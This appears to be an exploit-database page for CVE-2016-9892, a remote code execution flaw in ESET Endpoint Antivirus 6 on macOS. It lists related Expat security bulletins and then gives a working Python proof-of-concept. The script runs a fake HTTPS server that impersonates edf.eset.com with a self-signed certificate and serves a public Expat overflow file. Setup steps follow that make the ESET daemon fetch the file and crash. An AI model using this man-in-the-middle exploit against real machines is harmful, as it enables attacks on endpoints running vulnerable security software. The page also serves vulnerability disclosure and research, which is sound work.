Remote Code Execution as Root via ESET Endpoint Antivirus 6（CVE-2016-9892）

🗓️ 28 Feb 2017 00:00:00Reported by RootType

Remote Code Execution via ESET Endpoint Antiviru

Reporter	Title	Published	Views	Family All 216
0day.today	ESET Endpoint Antivirus 6 Remote Code Execution Exploit	28 Feb 201700:00	–	zdt
IBM Security Bulletins	IBM Security Network Protection / IBM QRadar Network Security / XGS Technote Index	31 Jan 202100:10	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Expat component shipped with IBM Rational ClearCase (CVE-2016-0718, CVE-2015-1283, CVE-2016-4472, CVE-2015-2716)	10 Jul 201808:34	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Flex System Manager (FSM) is affected by multiple expat vulnerabilities	18 Jun 201801:32	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Guardium is affected by Using Components with Known Vulnerabilities	16 Jun 201822:03	–	ibm
IBM Security Bulletins	Security Bulletin: A vulnerability in expat affects PowerKVM	18 Jun 201801:34	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Denial of Service vulnerabilities with Expat may affect IBM HTTP Server	8 Sep 202200:09	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Denial of Service vulnerabilities with Expat might affect IBM HTTP Server used with IBM Security Network Protection	16 Jun 201821:45	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Expat XML Parser vulnerabilities in Prospect	17 Jun 201815:27	–	ibm
IBM Security Bulletins	Security Bulletin: A vulnerability in Expat XML parser affects IBM Security Network Protection (CVE-2016-0718)	16 Jun 201821:48	–	ibm


                                                # Extract overflow.xml from https://bugzilla.suse.com/attachment.cgi?id=676490
# (ZIP file containing a public proof-of-concept for CVE-2016-0718) and run the
# following Python program:

import BaseHTTPServer, SimpleHTTPServer, ssl, subprocess

class XmlHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_POST(self):
        with open("overflow.xml") as f:
            xml = f.read()
        self.send_response(200)
        self.send_header("Content-Type", "text/xml")
        self.send_header("Content-Length", len(xml))
        self.end_headers()
        self.wfile.write(xml)

    def do_CONNECT(self):
        self.wfile.write("HTTP/1.1 200 Connection Established\r\n")
        self.end_headers()
        self.connection = ssl.wrap_socket(
                self.connection, certfile="/tmp/xml.crt",
                keyfile="/tmp/xml.key", server_side=True)
        self.rfile = self.connection.makefile("rb", self.rbufsize)
        self.wfile = self.connection.makefile("wb", self.wbufsize)
        self.close_connection = 0

subprocess.call("openssl req -newkey rsa:2048 -x509 -nodes -subj " +
                "/CN=edf.eset.com -out /tmp/xml.crt -keyout /tmp/xml.key",
                shell=True)

BaseHTTPServer.HTTPServer(("localhost", 4443), XmlHandler).serve_forever()
#________________________________________________________________________________
# 
# Next, open the ESET Endpoint Antivirus UI, choose "Setup --> Enter application
# preferences...", and enable a local proxy server for localhost:4443 (this proxy
# configuration is used to simulate a man-in-the-middle attack; a real-world
# attack would not require a victim to enable a proxy server).
# 
# Next, in the ESET Endpoint Antivirus UI, choose "Help --> Activate Product",
# enter any License Key value you like (such as 0000-0000-0000-0000-0000), and
# press "Activate".
# 
# The esets_daemon process will immediately crash (the public PoC overflow.xml
# file used above just demonstrates that the vulnerability exists; it does not
# perform actual code execution). You can confirm this by running
# /Applications/Utilities/Console.app/Contents/MacOS/Console and seeing that
# esets_daemon crashed.

28 Feb 2017 00:00Current

9High risk

Vulners AI Score9

EPSS0.13335